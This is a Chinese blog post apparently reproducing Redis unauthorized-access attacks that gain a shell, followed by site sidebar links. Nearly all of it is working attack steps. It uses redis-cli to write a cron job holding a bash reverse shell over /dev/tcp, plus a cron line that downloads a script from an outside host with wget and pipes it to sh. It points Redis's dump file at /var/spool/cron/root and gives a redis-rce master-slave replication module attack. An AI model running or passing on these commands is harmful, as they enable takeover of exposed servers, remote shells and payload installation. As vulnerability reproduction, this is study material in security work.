当前位置:网站首页>漏洞复现-redis未授权getshell
漏洞复现-redis未授权getshell
2022-08-09 18:37:00 【amingMM】
redis未授权getshell
简介:
Redis是一个开源的使用ANSI C语言编写、
支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,
并提供多种语言的API。
作为一个高性能的key-value数据库,
Redis在部分场景下对关系数据库起到很好的补充作用。
任务 getshell
E:\hack\envir\redis>redis-cli -h 120.xx.xx.4
rdm客户端 — info 打印 一下 未授权 Linux服务器
set xx "\n* * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n"
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
tw:0>config set dir /var/spool/cron/
"ERR Changing directory: No such file or directory"
尝试其他办法
tw2:0>config set dir /var/spool/cron/
"OK"
tw2:0>tw2:0>config set dbfilename root
"OK"
save
140.112.90.153:6379> save
(error) ERR
原因分析:
启动redis-server服务时,没有root权限
解决方案:
sudo kill -9 pid #将redis服务杀掉
sudo redis-server ***/redis.config #sudo使用root权限启动
主从复制 getshell
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git
进入RedisModules-ExecuteCommand目录输入
make
会生成moudle.so 文件
# cp /home/amingmm/RedisModules-ExecuteCommand/module.so /home/amingmm/RedisModules-ExecuteCommand/redis-rce
把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入
python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so
边栏推荐
- Openharmony轻量系统实验--GPIO点灯
- ebook下载 | 《 企业高管IT战略指南——企业为何要落地DevOps》
- [] free column Android run Android, her - as command of safety
- [Free Column] Android Fragment Injection for Android Security
- Mysql 表结构变更方案对比及分析
- ebook download | "Business executives' IT strategy guide - why enterprises should implement DevOps"
- hdu 2094 产生冠军(STL map || 拓扑 || STL set)
- 明明加了唯一索引,为什么还是产生重复数据?
- C#/VB.NET:从PowerPoint文档中提取文本和图片
- 没有 accept,建立 TCP 连接,可以吗?
猜你喜欢
WPF 实现带蒙版的 MessageBox 消息提示框
启动 CM agent 报错——ImportError: libssl.so.10: cannot open shared object file: No such file or directory
C#/VB.NET:从PowerPoint文档中提取文本和图片
![[免费专栏] Android安全之Android Fragment注入](/img/bf/244e7095ce010bfea799d02395b419.png)
[免费专栏] Android安全之Android Fragment注入
hdu 2094 产生冠军(STL map || 拓扑 || STL set)
『百日百题 · 基础篇』备战面试,坚持刷题 第五话——循环语句(2)!
![[免费专栏] Android安全之Android奇淫run-as命令](/img/d5/771802eb57f24c1cf88657f5c5a724.png)
[免费专栏] Android安全之Android奇淫run-as命令
国产抗新冠口服药每瓶不超300元/ 我国IPv6网络全面建成/ 谷歌入局折叠屏手机...今日更多新鲜事在此...
![[Free Column] Android Security for Peace Elite (FZ) APK Reverse Analysis](/img/22/a5129a310eec5ee1bf6f1cf90d05de.png)
[Free Column] Android Security for Peace Elite (FZ) APK Reverse Analysis
三星旗舰优惠千八,苹果优惠过千,国产旗舰只降五百打发叫花子
随机推荐
[免费专栏] Android安全之ZIP文件目录遍历漏洞
Paper sharing: "FED BN" uses the LOCAL BATCH NORMALIZATION method to solve the Non-iid problem
技术分享 | 接口自动化测试如何处理 Header cookie
Tims中国上市进入倒计时:年亏3.8亿 估值降至14亿美元
Go-Excelize API源码阅读(五)—— Close()
grafana对接本地ldap
华为云创新中心助力启泰智能 补齐中小模具企业数字化能力短板
[免费专栏] Android安全之数据存储与数据安全【大集合】
OpenHarmony如何查询设备类型
开源一夏 | 基于若依架构的列表详情展示
如何抑制告警风暴?
Iptables防火墙常见的典型应用场景
2021 RoboCom 世界机器人开发者大赛-本科组(决赛)
Pytorch 固定部分参数训练
Flume (六) --------- Flume 数据流监控
RT-Thread推荐入围国赛及群体挑战赛名单
[Free column] APK dynamic reverse application of Android security [Three Smali injection methods]
php删除字符串的空格
基于Web的疫情隔离区订餐系统
MYSQL物理存储文件的页和INNOBUF的页是否有大小区别?